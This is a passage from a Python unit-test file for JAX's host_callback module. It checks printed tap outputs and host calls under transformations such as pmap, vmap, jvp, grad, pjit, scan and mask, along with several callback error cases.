transforms: [('batch', {'batch_dims': (0, 0)})] what: x,x^2
( [0. 1. 2.]
[0. 1. 4.] )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
print(f"jvp = {jax.jvp(power3, (3.,), (0.1,))}")
hcb.barrier_wait()
expected = """
transforms: ['jvp'] what: x,x^2
( ( 3.
9. )
( 0.1
0.6 ) )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
print(f"grad = {jax.grad(power3)(3.)}")
hcb.barrier_wait()
expected = """
what: x,x^2
( 3.
9. )
transforms: ['jvp', 'transpose'] what: x,x^2
( 0.
3. )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
print(f"vmap o grad {jax.vmap(jax.grad(power3))(np.array([2., 3.]))}")
hcb.barrier_wait()
expected = """
transforms: [('batch', {'batch_dims': (0, 0)})] what: x,x^2
( [2. 3.]
[4. 9.] )
transforms: ['jvp', 'transpose', ('batch', {'batch_dims': (None, 0)})] what: x,x^2
( 0.
[2. 3.] )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
def test_tap_pmap(self):
if len(local_devices()) < 2:
raise SkipTest("test requires at least 2 devices")
def power3(x):
y = x * x
# Print both 'x' and 'x^2'. Must pack as a tuple.
_, y = hcb.id_print((x, y),
what="x,x^2",
output_stream=testing_stream,
tap_with_device=True)
return y * x
pmap_power3 = api.pmap(power3, devices=local_devices())
xv = np.array([3, 4], dtype=np.int32)
res = pmap_power3(xv)
hcb.barrier_wait()
self.assertAllClose(xv * xv * xv, res, check_dtypes=False)
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(
self, """
device: cpu:0 what: x,x^2
( 3
9 )
device: cpu:1 what: x,x^2
( 4
16 )""")
def test_tap_pmap_vmap(self):
# A matrix M[ij] = i * 10 + j
nr_devices = len(local_devices())
shape = (nr_devices, 3)
matrix = np.fromfunction(lambda i, j: 10. * i + j, shape,
dtype=np.int32)
def fun1(x, do_print=False): # x: i32
return maybe_print(do_print, x * 2, "x * 2", tap_with_device=True)
pmap_vmap_fun1 = api.pmap(
api.vmap(partial(fun1, do_print=True)), devices=local_devices())
res = pmap_vmap_fun1(matrix)
hcb.barrier_wait()
expected_res = api.pmap(
api.vmap(partial(fun1, do_print=False)), devices=local_devices())(
matrix)
self.assertAllClose(expected_res, res, check_dtypes=False)
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(self, """
device: cpu:0 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[0.00 2.00 4.00]
device: cpu:1 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[20.00 22.00 24.00]""")
def test_tap_pmap_pmap_vmap(self):
# A matrix M[ijk] = i * 100 + j * 10 + k
nr_devices = len(local_devices())
if nr_devices % 2 != 0:
raise SkipTest("test works only on even number of devices")
shape = (2, nr_devices // 2, 3)
matrix = np.fromfunction(lambda i, j, k: 100. * i + 10. * j + k, shape,
dtype=np.float32)
def fun1(x, do_print=False): # x: f32
y = maybe_print(do_print, x * 2., "x * 2", tap_with_device=True)
return y ** 2
pmap_fun1 = api.pmap(
api.pmap(api.vmap(partial(fun1, do_print=True))),
devices=local_devices())
res = pmap_fun1(matrix)
hcb.barrier_wait()
expected_res = api.pmap(
api.pmap(api.vmap(partial(fun1, do_print=False))),
devices=local_devices())(
matrix)
self.assertAllClose(expected_res, res, check_dtypes=False)
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(self, """
device: cpu:0 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[0.00 2.00 4.00]
device: cpu:1 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[200.00 202.00 204.00]""")
@ignore_jit_of_pmap_warning()
def test_tap_pmap_pmap_extra(self):
"""pmap of a pmap surrounded by extra code."""
# A matrix M[ij] = i * 10 + j
nr_devices = len(local_devices())
if nr_devices != 2:
raise SkipTest("test works only on 2 devices")
shape = (2, 1, 3)
matrix = np.fromfunction(lambda i, j, k: 100. * i + 10. * j + k, shape,
dtype=np.float32)
def fun(xv, do_print=False):
# This will be printed on all devices, with shape [1, 3]
xv = maybe_print(do_print, xv + 1., "before", tap_with_device=True)
res = api.pmap(lambda x: maybe_print(do_print, x * 2., "inside", tap_with_device=True))(xv)
# This will be printed on all devices, with shape [1, 3]
return maybe_print(do_print, res + 1., "after", tap_with_device=True)
res = api.pmap(partial(fun, do_print=True))(matrix)
self.assertAllClose(fun(matrix, do_print=False), res, check_dtypes=False)
hcb.barrier_wait()
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(self, """
device: cpu:0 what: before
[[1.00 2.00 3.00]]
device: cpu:0 what: inside
[2.00 4.00 6.00]
device: cpu:0 what: after
[[3.00 5.00 7.00]]
device: cpu:1 what: before
[[101.00 102.00 103.00]]
device: cpu:1 what: inside
[202.00 204.00 206.00]
device: cpu:1 what: after
[[203.00 205.00 207.00]]""")
def test_tap_jvp_pmap_vmap(self):
# A matrix M[ijk] = i * 100 + j * 10 * k
nr_devices = len(local_devices())
shape = (nr_devices, 2, 3)
matrix = np.fromfunction(lambda i, j, k: 100. * i + 10. * j + k, shape,
dtype=np.float32)
def fun(xv, do_print=False):
# x: f32[3]
return api.jvp(api.pmap(api.vmap(lambda x: maybe_print(do_print, x * 2., "x * 2", tap_with_device=True))),
(xv,), (.1 * jnp.ones_like(xv),))
res = fun(matrix, do_print=True)
hcb.barrier_wait()
expected_res = fun(matrix, do_print=False)
self.assertAllClose(expected_res, res, check_dtypes=False)
# Assertion text is for 2 devices (also works for 1 device)
# Device 0 will get to execute api.jvp(api.vmap(...)) for matrix[0, :, :]
assertMultiDeviceOutputEqual(self, """
device: cpu:0 transforms: [('batch', {'batch_dims': (0,)}), 'jvp'] what: x * 2
( [[ 0.00 2.00 4.00]
[20.00 22.00 24.00]]
[[0.20 0.20 0.20]
[0.20 0.20 0.20]] )
device: cpu:1 transforms: [('batch', {'batch_dims': (0,)}), 'jvp'] what: x * 2
( [[200.00 202.00 204.00]
[220.00 222.00 224.00]]
[[0.20 0.20 0.20]
[0.20 0.20 0.20]] )""")
def test_tap_vmap_pmap(self):
# A matrix M[ijk] = i * 100 + j * 10 * k
nr_devices = len(local_devices())
shape = (2, nr_devices, 3)
matrix = np.fromfunction(lambda i, j, k: 100. * i + 10. * j + k, shape,
dtype=np.float32)
def fun(xv, do_print=False):
# x: f32[3]
return api.vmap(api.pmap(lambda x: maybe_print(do_print, x * 2., "x * 2", tap_with_device=True)))(xv)
res = fun(matrix, do_print=True)
hcb.barrier_wait()
expected_res = fun(matrix, do_print=False)
self.assertAllClose(expected_res, res, check_dtypes=False)
# Assertion text is for 2 devices (also works for 1 device)
# Device 0 will get to execute api.jvp(api.vmap(...)) for matrix[:, 0, :]
assertMultiDeviceOutputEqual(self, """
device: cpu:0 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[[ 0.00 2.00 4.00]
[200.00 202.00 204.00]]
device: cpu:1 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[[ 20.00 22.00 24.00]
[220.00 222.00 224.00]]""")
@ignore_jit_of_pmap_warning()
def test_tap_jit_pmap_extra(self):
"""jit of a pmap surrounded by extra code."""
# A matrix M[ij] = i * 10 + j
nr_devices = len(local_devices())
assert nr_devices in (1, 2)
shape = (nr_devices, 3)
matrix = np.fromfunction(lambda i, j: 10. * i + j, shape,
dtype=np.float32)
def fun(xv, do_print=False):
# This will be printed on all devices with shape (nr_devices, 3)
xv = maybe_print(do_print, xv + 1., "before", tap_with_device=True)
res = api.pmap(lambda x: maybe_print(do_print, x * 2., "inside", tap_with_device=True))(xv)
# This will be printed on all devices with shape (nr_devices, 3)
return maybe_print(do_print, res + 1., "after", tap_with_device=True)
res = api.jit(partial(fun, do_print=True))(matrix)
self.assertAllClose(fun(matrix, do_print=False), res, check_dtypes=False)
hcb.barrier_wait()
if len(local_devices()) == 2:
assertMultiDeviceOutputEqual(self, """
device: cpu:0 what: before
[[ 1.00 2.00 3.00]
[11.00 12.00 13.00]]
device: cpu:0 what: inside
[2.00 4.00 6.00]
device: cpu:0 what: after
[[ 3.00 5.00 7.00]
[23.00 25.00 27.00]]
device: cpu:1 what: before
[[ 1.00 2.00 3.00]
[11.00 12.00 13.00]]
device: cpu:1 what: inside
[22.00 24.00 26.00]
device: cpu:1 what: after
[[ 3.00 5.00 7.00]
[23.00 25.00 27.00]]""")
else:
assert len(local_devices()) == 1
assertMultiDeviceOutputEqual(self, """
device: cpu:0 what: before
[[1.00 2.00 3.00]]
device: cpu:0 what: inside
[2.00 4.00 6.00]
device: cpu:0 what: after
[[3.00 5.00 7.00]]""")
def test_tap_cond_pmap(self):
raise SkipTest("cond of pmap does not work in JAX. Issue #5178.")
# A matrix M[ij] = i * 10 + j
nr_devices = len(local_devices())
shape = (nr_devices, 3)
matrix = np.fromfunction(lambda i, j: 10. * i + j, shape,
dtype=np.float32)
def fun1(x, do_print=False):
return maybe_print(do_print, x * 2., "x * 2")
def fun2(cond, xv, do_print=False):
return lax.cond(cond, api.pmap(partial(fun1, do_print=do_print)),
lambda xv: xv, xv)
res = fun2(True, matrix)
self.assertAllClose(fun2(True, matrix, do_print=False), res, check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
TBD""", testing_stream.output)
@jtu.skip_on_devices("cpu", "gpu")
# TODO(necula): file XLA:GPU bug for the 'Sharding' CustomCall
def test_tap_pjit(self):
devices = np.array(local_devices())
nr_devices = len(devices)
if nr_devices < 2:
raise SkipTest("test requires at least 2 devices")
print(f"test_tap_pjit is running on devices {devices}.")
# x: i32[D, 3] = [[0, 1, 2], [10, 11, 12], ...]
# y: i32[3, 4]
x = jnp.arange(100, dtype=jnp.int32).reshape((10, 10))[:nr_devices, :3]
y = jnp.ones((3, 4), np.int32)
@partial(jax.named_call, name="fun1") # for xprof debugging
def fun1(x, do_print=False):
z = jnp.dot(x, y)
return maybe_print(do_print, z, "z", tap_with_device=True)
res0 = fun1(x, do_print=False)
pjit_fun1 = pjit.pjit(
partial(fun1, do_print=True),
in_axis_resources=(P("d"),),
out_axis_resources=P("d"))
with maps.mesh(devices, ["d"]):
# Print the internal IR
helper_log_ir(
f"{self._testMethodName}.pjit",
pjit_fun1,
x,
num_partitions=nr_devices)
res = pjit_fun1(x)
self.assertAllClose(res0, res)
hcb.barrier_wait("before check")
# Assertion text is for 2 devices (also works for 1 device)
# Note that a single call is made.
assertMultiDeviceOutputEqual(
self, """
device: cpu:0 what: z
[[ 3 3 3 3]
[33 33 33 33]]""")
def test_tap_tap_scan_custom_jvp(self):
"""custom JVP, inside scan.
This exercises the custom_jvp_call_jaxpr primitives."""
@api.custom_jvp
def f(x):
return x * hcb.id_print(x, output_stream=testing_stream, what="x")
@f.defjvp
def f_jvp(primals, tangents):
x, = primals
x_dot, = tangents
primal_out = f(x)
tangent_out = 3. * x * hcb.id_print(x_dot, output_stream=testing_stream, what="x_dot")
return primal_out, tangent_out
def g(x):
# Sum f(x_i)
return lax.scan(lambda carry, inp: (carry + f(inp), 0.),
np.full(x.shape[1:], 0.), # Like x w/o leading dim
x)[0]
arg = np.full((2,), 0.7)
self.assertAllClose(0.7 * 0.7 * 2, g(arg))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
what: x
0.7
what: x
0.7""", testing_stream.output)
testing_stream.reset()
self.assertAllClose(np.array([2.1, 2.1]), api.grad(g)(arg), check_dtypes=False)
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
what: x
0.7
what: x
0.7
transforms: ['transpose'] what: x_dot
2.1
transforms: ['transpose'] what: x_dot
2.1""", testing_stream.output)
def test_tap_scan_custom_vjp(self):
"""custom VJP, inside scan.
This exercises the custom_vjp_call_jaxpr primitives."""
@api.custom_vjp
def f(x):
return x * hcb.id_print(x, output_stream=testing_stream, what="x")
# f_fwd: a -> (b, residual)
def f_fwd(x):
return f(x), 3. * x
# f_bwd: (residual, CT b) -> [CT a]
def f_bwd(residual, ct_b):
return residual * hcb.id_print(ct_b, output_stream=testing_stream, what="ct_b"),
f.defvjp(f_fwd, f_bwd)
def g(x):
# Sum f(x_i)
return lax.scan(lambda carry, inp: (carry + f(inp), 0.),
np.full(x.shape[1:], 0.), # Like x w/o leading dim
x)[0]
arg = np.full((2,), 0.7)
self.assertAllClose(0.7 * 0.7 * 2, g(arg))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
what: x
0.7
what: x
0.7""", testing_stream.output)
testing_stream.reset()
self.assertAllClose(np.array([2.1, 2.1]), api.grad(g)(arg), check_dtypes=False)
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
what: x
0.7
what: x
0.7
what: ct_b
1.
what: ct_b
1.""", testing_stream.output)
def test_tap_mask(self):
@partial(api.mask, in_shapes=['n'], out_shape='')
def padded_sum(x):
three_x = hcb.id_print((x, 2 * x), result=3 * x, what="x",
output_stream=testing_stream)
return jnp.sum(three_x)
x = np.arange(5.)
self.assertAllClose(9., padded_sum([x], dict(n=3)))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
transforms: [('mask', {'logical_shapes': 5})] what: x
( ( [0. 1. 2. 3. 4.]
[0. 2. 4. 6. 8.] )
( ( 3 )
( 3 ) ) )""", testing_stream.output)
testing_stream.reset()
# With VMAP
xv = np.arange(10.).reshape((2, 5)) # logical_shape = 5
self.assertAllClose(
np.array([9., 78.]),
# batch_size = 2, n=3 and 4 for the two elements
api.vmap(padded_sum)([xv],
dict(n=np.array([3., 4.]))))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
transforms: [('mask', {'logical_shapes': 5}), ('batch', {'batch_dims': (0, 0, 0, 0)})] what: x
( ( [[0. 1. 2. 3. 4.]
[5. 6. 7. 8. 9.]]
[[ 0. 2. 4. 6. 8.]
[10. 12. 14. 16. 18.]] )
( ( [3. 4.] )
( [3. 4.] ) ) )""", testing_stream.output)
testing_stream.reset()
# With JVP
self.assertAllClose((9., 0.9),
api.jvp(lambda arg: padded_sum([arg], dict(n=3)),
(x,), (x * 0.1,)))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
transforms: [('mask', {'logical_shapes': 5}), 'jvp'] what: x
( ( ( [0. 1. 2. 3. 4.]
[0. 2. 4. 6. 8.] )
( ( 3 )
( 3 ) ) )
( ( [0. 0.1 0.2 0.3 0.4]
[0. 0.2 0.4 0.6 0.8] )
( ( False )
( False ) ) ) )""", testing_stream.output)
testing_stream.reset()
# Now with JIT
self.assertAllClose(9., api.jit(padded_sum)([x], dict(n=3)))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
transforms: [('mask', {'logical_shapes': 5})] what: x
( ( [0. 1. 2. 3. 4.]
[0. 2. 4. 6. 8.] )
( ( 3 )
( 3 ) ) )""", testing_stream.output)
def test_tap_callback_delay(self):
hcb.callback_extra = lambda dev: time.sleep(1)
def func(x):
for i in range(5):
x = hcb.id_print(x * i, what="x times i")
return x
api.jit(func)(np.arange(6, dtype=np.float32).reshape((2, 3)))
def test_tap_callback_delay_barrier(self):
hcb.callback_extra = lambda dev: time.sleep(2)
def func(x):
for i in range(1, 4):
x = hcb.id_print(x * i, what=f"x times {i}", output_stream=testing_stream)
return x
api.jit(func)(np.arange(6, dtype=np.float32).reshape((2, 3)))
# Wait for the results
hcb.barrier_wait("first")
expected = """
what: x times 1
[[0. 1. 2.]
[3. 4. 5.]]
what: x times 2
[[ 0. 2. 4.]
[ 6. 8. 10.]]
what: x times 3
[[ 0. 6. 12.]
[18. 24. 30.]]"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
# Call again
api.jit(func)(np.arange(6, dtype=np.float32).reshape((2, 3)))
hcb.barrier_wait("second")
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
def test_tap_error_bad_consumer_id(self):
"""Try to use reserved consumer ID 0.
Check that we get the proper error from the runtime."""
if not hcb._use_outfeed(jtu.device_under_test()):
raise SkipTest("test works only for outfeed")
comp = xla_bridge.make_computation_builder(self._testMethodName)
token = hcb.xops.CreateToken(comp)
hcb._initialize_outfeed_receiver() # Needed if this is the sole test
with self.assertRaisesRegex(RuntimeError,
"Consumer ID cannot be a reserved value: 0"):
hcb._callback_handler_data.receiver.add_outfeed(
comp, token, 0,
[xla_bridge.constant(comp, np.zeros((2, 3), dtype=np.float32))])
def test_tap_error_different_shapes(self):
"""Try to register different shapes for the same consumer ID."""
if not hcb._use_outfeed(jtu.device_under_test()):
raise SkipTest("test works only for outfeed")
comp = xla_bridge.make_computation_builder(self._testMethodName)
token = hcb.xops.CreateToken(comp)
hcb._initialize_outfeed_receiver() # Needed if this is the sole test
hcb._callback_handler_data.receiver.add_outfeed(
comp, token, 123,
[xla_bridge.constant(comp, np.zeros((2, 3), dtype=np.float32))])
with self.assertRaisesRegex(
RuntimeError, ".*does not match previous shape element_type.*"):
hcb._callback_handler_data.receiver.add_outfeed(
comp, token, 123,
[xla_bridge.constant(comp, np.zeros((2, 3), dtype=np.int32))])
with self.assertRaisesRegex(
RuntimeError, ".*does not match previous shape element_type.*"):
hcb._callback_handler_data.receiver.add_outfeed(
comp, token, 123,
[xla_bridge.constant(comp, np.zeros((2,), dtype=np.float32))])
def test_tap_id_tap_removed_kwargs(self):
def func(x, transforms, y):
pass
with self.assertRaisesRegex(TypeError, r"Support for \*\*kwargs in ``id_tap``"):
hcb.id_tap(func, 1, y=2)
def test_tap_odeint(self):
# TODO: find a smaller repro for bug #4015
# Seems to be xla_call(scan(xla_call)), all under grad.
from jax.experimental.ode import odeint
def f(x, t, k):
x = hcb.id_print(x)
return -k * x
def loss(k=1.0):
t = jnp.linspace(0, 0.001, num=2)
xs = odeint(f, 1.0, t, k)
return xs[-1]
api.grad(loss)(1.0) # should not fail
def test_tap_remat(self):
def f(i, k):
x = hcb.id_print(k + i, output_stream=testing_stream)
return k * x
def loss(k):
return lax.fori_loop(0, 2, api.remat(f), k)
print(loss(3))
hcb.barrier_wait()
expected = """
3
10"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
def test_tap_named_call(self):
def tap_scalar(init, do_print=False):
@partial(api.named_call, name="step")
def step(acc, step_nr):
acc = acc + step_nr
maybe_print(do_print, step_nr, what="step_nr")
return acc, None
return lax.scan(step, init, np.arange(2))
self.assertAllClose(tap_scalar(3., do_print=False), tap_scalar(3., do_print=True))
hcb.barrier_wait()
expected = """
what: step_nr
0
what: step_nr
1"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
class HostCallbackCallTest(jtu.JaxTestCase):
"""Tests for hcb.call"""
def setUp(self):
super().setUp()
if jtu.device_under_test() == "gpu" and jax.device_count() > 1:
raise SkipTest("host_callback broken on multi-GPU platforms (#6447)")
testing_stream.reset()
testing_stream._test_method_name = self._testMethodName
def tearDown(self) -> None:
hcb.barrier_wait("HostCallbackCallTest.tearDown")
super().tearDown()
def call_log_testing_stream(self, func, arg, *, result_shape, name=""):
"""Call `func` and log inputs and outputs to the testing stream"""
def call_log(arg):
def val2str(v):
return np.array2string(np.array(arg))
testing_stream.write(f"Call {name}({val2str(arg)})\n")
res = func(arg)
testing_stream.write(f" = {val2str(res)}\n")
return res
return hcb.call(call_log, arg, result_shape=result_shape)
def test_call_simple(self):
def f_outside(x):
return 2 * x
def fun(x):
y = hcb.call(f_outside, x + 1, result_shape=x)
return 3 * (1 + y)
arg = np.arange(24, dtype=np.int32).reshape((2, 3, 4))
self.assertAllClose(3 * (1 + 2 * (arg + 1)), fun(arg))
@parameterized.named_parameters(
jtu.cases_from_list(
dict(testcase_name=f"_{np.dtype(dtype).name}", dtype=dtype)
for dtype in jtu.dtypes.all
if dtype != np.bool_))
def test_call_types(self, dtype=np.float64):
def f_outside(x):
# Use x + x to ensure that the result type is the same
return x + x
def fun(x):
return hcb.call(f_outside, x + x, result_shape=x)
arg = np.arange(24, dtype=dtype).reshape((2, 3, 4))
self.assertAllClose(arg + arg + arg + arg, fun(arg), check_dtypes=True)
def test_call_types_bool(self, dtype=np.float64):
def f_outside(x):
return np.invert(x)
def fun(x):
return hcb.call(f_outside, x, result_shape=x)
arg = np.random.choice(a=[True, False], size=(2, 3, 4))
self.assertAllClose(np.invert(arg), fun(arg))
def test_call_tuples(self):
def f_outside(args):
x, y = args
return y, x # Swap the tuple
def fun(x):
xy = hcb.call(f_outside, (x, x + 1), result_shape=(x, x))
return 2 * xy[0] + 3 * xy[1]
arg = np.arange(24, dtype=np.int32).reshape((2, 3, 4))
self.assertAllClose(2 * (arg + 1) + 3 * arg, fun(arg))
def test_call_empty_arg(self):
"""Call with empty array."""
result = np.ones((2,), dtype=np.float32)
def f_outside(_):
return result
def fun(x):
return x + hcb.call(f_outside, (),
result_shape=api.ShapeDtypeStruct(result.shape, result.dtype))
self.assertAllClose(2. + result, fun(2.))
def test_call_empty_result(self):
"""Call returning empty array."""
result_shape = (2, 0)
def f_outside(_):
return np.ones(result_shape, dtype=np.float32)
def fun(x):
return x + hcb.call(f_outside, 1.,
result_shape=api.ShapeDtypeStruct(result_shape, np.float32))
self.assertAllClose(f_outside(0.), fun(2.))
def test_call_empty_result_inside_pytree(self):
"""Call returning a tuple with an empty array and a non-empty one."""
result_shape_0 = (2, 0)
result_shape_2 = (0,)
def f_outside(_):
return (np.ones(result_shape_0, dtype=np.float32),
np.ones((1,), dtype=np.float32),
np.ones(result_shape_2, dtype=np.float32))
def fun(x):
res = hcb.call(f_outside, 1.,
result_shape=(api.ShapeDtypeStruct(result_shape_0, np.float32),
api.ShapeDtypeStruct((1,), np.float32),
api.ShapeDtypeStruct(result_shape_2, np.float32)))
self.assertEqual(result_shape_0, res[0].shape)
self.assertEqual(result_shape_2, res[2].shape)
return x + res[1]
self.assertAllClose(2 + np.ones((1,), dtype=np.float32), fun(2.))
def test_call_empty_result_all_pytree(self):
"""Call returning a tuple of empty arrays."""
result_shape = (2, 0)
def f_outside(_):
return (np.ones(result_shape, dtype=np.float32),
np.ones(result_shape, dtype=np.float32))
def fun(x):
res = hcb.call(f_outside, 1.,
result_shape=(api.ShapeDtypeStruct(result_shape, np.float32),
api.ShapeDtypeStruct(result_shape, np.float32)))
return x + res[0] + res[1]
self.assertAllClose(np.ones(result_shape, dtype=np.float32),
fun(2.))
def test_call_no_result(self):
def f_outside(arg):
self.call_log_testing_stream(lambda x: None, arg,
result_shape=None,
name="outside")
return arg
self.assertAllClose((3., 4.), f_outside((3., 4.)))
hcb.barrier_wait()
expected = """
Call outside([3. 4.])
= [3. 4.]"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
def test_call_cond(self):
def f_outside(args):
x, y = args
return x * y
def loop(x, use_outside=True):
def body(i, acc):
return lax.cond(i % 2 == 1,
lambda _: (hcb.call(f_outside, (acc, i),
result_shape=acc)
if use_outside else f_outside((acc, i))),
lambda _: acc,
None)
return lax.fori_loop(0, 18, body, x)
res_inside = loop(1.2, use_outside=False)
self.assertAllClose(res_inside, api.jit(loop)(1.2))
def test_call_jit_scan_call(self):
def f_outside(x):
return x
def loop(x, use_outside=True):
def body(carry, i):
if use_outside:
return carry + hcb.call(f_outside, i,
result_shape=i), None
else:
return carry + i, None
return lax.scan(body, 0, x)
x = np.arange(5, dtype=np.int32)
res_outside = api.jit(partial(loop, use_outside=True))(x)
self.assertAllClose(res_outside, loop(x, use_outside=False))
def test_call_doc_example1(self):
"""Examples from the documentation: simplest, call a function"""
def host_eig(x):
return np.linalg.eigvals(x)
shape = (2, 5, 4, 4)
m = np.ones(shape, dtype=np.float32)
def fun(m):
eig_m = hcb.call(host_eig, m,
result_shape=api.ShapeDtypeStruct(m.shape[:-1], m.dtype))
return eig_m
expected_res = np.linalg.eigvals(m)
self.assertAllClose(expected_res, fun(m))
def test_call_doc_example_hlo(self):
"""Examples from the documentation: simplest, call a function."""
def fun1(m):
return jnp.sin(hcb.call(lambda x: np.cos,
jnp.cos(m),
result_shape=m))
m = np.ones((2,), np.float32)
helper_print_optimized_hlo(fun1, m)
def fun2(m):
x = hcb.call(lambda x: None, 2, result_shape=())
return x
m = np.ones((2,), np.float32)
helper_print_optimized_hlo(fun2, m)
def test_call_with_device(self):
def callback_func(x, device=None):
testing_stream.write(f"device: {device}\n Called with {x}")
return x
def func(x):
return hcb.call(callback_func, x,
result_shape=x,
call_with_device=True)
self.assertEqual(3., func(3.))
assertMultiDeviceOutputEqual(self, """
device: cpu:0
Called with 3.00""")
def test_call_pmap(self):
# Works for 1 or 2 devices
def callback_func(x, device=None):
testing_stream.write(f"device: {device}\n Called with {x}")
return x * np.array(3, np.int32)
def fun(x): # x: i32
return hcb.call(callback_func, x * 2,
result_shape=x,
call_with_device=True)
xv = jnp.arange(len(local_devices()), dtype=jnp.int32)
res = api.pmap(fun)(xv)
self.assertAllClose(api.pmap(lambda x: x * 6)(xv), res)
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(self, """
device: cpu:0
Called with 0
device: cpu:1
Called with 2""")
def test_call_vmap(self):
def f_outside(x): return x
def fun(x):
return hcb.call(f_outside, x, result_shape=x)
with self.assertRaisesRegex(NotImplementedError,
"batching rules are implemented only for id_tap, not for call"):
api.vmap(fun)(np.ones((2, 3)))
@jtu.skip_on_devices("cpu", "gpu")
# TODO(necula): file XLA:GPU bug for the 'Sharding' CustomCall
def test_call_pjit(self):
devices = np.array(local_devices())
nr_devices = len(devices)
if nr_devices < 2:
raise SkipTest("test requires at least 2 devices")
print(f"test_call_pjit is running on devices {devices}.")
# x: i32[D, 3] = [[0, 1, 2], [10, 11, 12], ...]
# y: i32[3, 4]
x = jnp.arange(100, dtype=jnp.int32).reshape((10, 10))[:nr_devices, :3]
y = jnp.ones((3, 4), np.int32)
def callback_x5_func(x, device=None):
testing_stream.write(f"device: {device}\n Called with {x}")
return x * np.array(5, np.int32)
def fun(x):
xy = jnp.dot(x, y)
return hcb.call(
callback_x5_func, xy, result_shape=xy, call_with_device=True)
pjit_fun = pjit.pjit(
fun, in_axis_resources=(P("d"),), out_axis_resources=P("d"))
with maps.mesh(devices, ["d"]):
# Print the internal IR
helper_log_ir(
f"{self._testMethodName}.pjit",
pjit_fun,
x,
num_partitions=nr_devices)
res = pjit_fun(x)
expected_res = jnp.dot(x, y) * np.array(5, np.int32)
self.assertAllClose(expected_res, res, check_dtypes=False)
hcb.barrier_wait("before assertion")
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(
self, """
device: cpu:0
Called with [[ 3 3 3 3]
[33 33 33 33]]""")
def test_call_error_bad_result_shape(self):
with self.assertRaisesRegex(
ValueError,
"The values must be either numeric scalars, or must have 'shape' and 'dtype' attributes"):
hcb.call(lambda x: x, 3., result_shape="string")
with self.assertRaisesRegex(
ValueError,
"The values must be either numeric scalars, or must have 'shape' and 'dtype' attributes"):
hcb.call(lambda x: x, 3., result_shape=lambda x: x)
hcb.barrier_wait("wait for error")
def helper_check_callback_errors(self, thunk: Callable,
expected_exc_txt: str):
"""Calls thunk() and checks for expected exceptions.
"""
if jtu.device_under_test() == "cpu":
# On CPU the runtime crashes, and the tests are all aborted
raise SkipTest("TODO: CPU runtime crashes on unexpected infeed")
elif jtu.device_under_test() == "gpu":
# On GPU we get a nice error back to Python
with self.assertRaisesRegex(
RuntimeError,
"RET_CHECK failure .* Mismatch between infeed source buffer shape s8.12345."):
thunk()
elif jtu.device_under_test() == "tpu":
# On TPU we get no error!!!
raise SkipTest("TODO: TPU runtime does not check infeed, and just computes with garbage")
# Both on GPU and TPU we also get an error during the barrier_wait at the
# end of the test. Run a barrier_wait now, to consume that error.
with self.assertRaisesRegex(
hcb.CallbackException,
re.compile(
"There were exceptions during callback processing.*Last one was:.*" +
expected_exc_txt,
re.DOTALL)):
hcb.barrier_wait("Waiting for error")
def test_call_error_callback_throws_exception(self):
def f_outside(x):
raise ValueError("user exception")
def fun(x):
return hcb.call(f_outside, x, result_shape=x)
self.helper_check_callback_errors(lambda: fun(3.),
"ValueError: user exception")
def test_call_error_callback_returns_unexpected_shape(self):
def fun(x):
return hcb.call(lambda x: (x, x), x, result_shape=x)
self.helper_check_callback_errors(lambda: fun(3.),
"Callback func .* should have returned a result with pytree")
def test_call_error_then_compute(self):
# Continue computation on device after error
def f_outside(x):
raise ValueError("user exception")
def fun(x):
x1 = hcb.call(f_outside, x, result_shape=x)
return x1
arg = np.arange(3, dtype=np.int32)
self.helper_check_callback_errors(lambda: self.assertAllClose(arg, fun(arg)),
"ValueError: user exception")
def call_jax_other_device(jax_outside_fun, arg, *, device):
"""Calls a JAX function on a specific device with simple support for reverse AD.
Functions whose name starts with "jax_outside" are called on another device,
by way of hcb.call.
"""
def run_jax_outside_fun(arg):
return api.jit(jax_outside_fun)(api.device_put(arg, device))
@api.custom_vjp
def make_call(arg):
return hcb.call(run_jax_outside_fun, arg,
result_shape=api.eval_shape(jax_outside_fun, arg))
# Define the fwd and bwd custom_vjp functions
def make_call_vjp_fwd(arg):
# Return the primal argument as the residual. Use `make_call` for the
# primal computation to enable higher-order AD.
return make_call(arg), arg # Return the primal argument as the residual
def make_call_vjp_bwd(res, ct_res):
arg = res # residual is the primal argument
def jax_outside_vjp_fun(arg_and_ct):
arg, ct = arg_and_ct
_, f_vjp = api.vjp(jax_outside_fun, arg)
ct_in, = f_vjp(ct)
return ct_in
return (call_jax_other_device(jax_outside_vjp_fun, (arg, ct_res), device=device),)
make_call.defvjp(make_call_vjp_fwd, make_call_vjp_bwd)
return make_call(arg)
class CallJaxTest(jtu.JaxTestCase):
"""Tests using `call_jax_other_device`."""
def setUp(self):
if jtu.device_under_test() == "gpu" and jax.device_count() > 1:
